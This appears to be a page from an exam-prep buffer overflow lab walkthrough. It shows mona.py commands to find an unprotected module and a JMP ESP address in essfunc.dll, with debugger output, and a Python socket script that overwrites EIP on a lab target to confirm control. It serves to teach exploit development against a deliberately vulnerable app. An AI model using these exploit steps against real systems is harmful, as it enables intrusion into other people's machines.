Finding a Return Address
This Return Address would be written in the EIP and used to direct the application to where our payload will be located! Mona.py would be used for this as well.
Listing all modules
The following command returns a bunch of programs/dependencies that our software in question uses/calls when operating. We notice that one of them has no memory protection or whatsoever. This would be useful for the process.
!mona modules
Analyzing Output
Log data, item 12
Address=0BADF00D
Message= 0x62500000 | 0x62508000 | 0x00008000 | False | False | False | False | False | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)Searching through the output, essfunc.dll seems to have most of the protections turned off which would allow for this attack to go through.
Locating OpCode syscall
Generating OpCode
The next step would be to generate the opt code for “JMP ESP” so that we can look for it in essfunc.dll. We will be using msf-nasm_shell for this.
msf-nasm_shell
Finding JMP ESP
!mona find -s "\xff\xe4" -m "essfunc.dll"
Log data, item 11
Address=625011AF
Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)0x625011AF
Hitting Offset
Now that we have an offset, we can try setting a breakpoint and hitting to verify that we have full control.
Setting breakpoint
Then, hit F2 to set the breakpoint
returnAddress.py
#!/usr/bin/python
import socket
try:
print ("\nSending evil buffer...")
prefix = "OVERFLOW10 "
filler = "A" * 537
eip = "\xaf\x11\x50\x62" #0x625011AF
buffer = prefix + filler + eip
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("windows.box", 1337))
s.send(buffer)
s.close()
print ("\nDone!")
except:
print ("\nCould not connect!")Hitting breakpoint
python returnAddress.py
Our debugger shows that we did hit the JMP ESP and hit the breakpoint that we set previously.
Last updated
Was this helpful?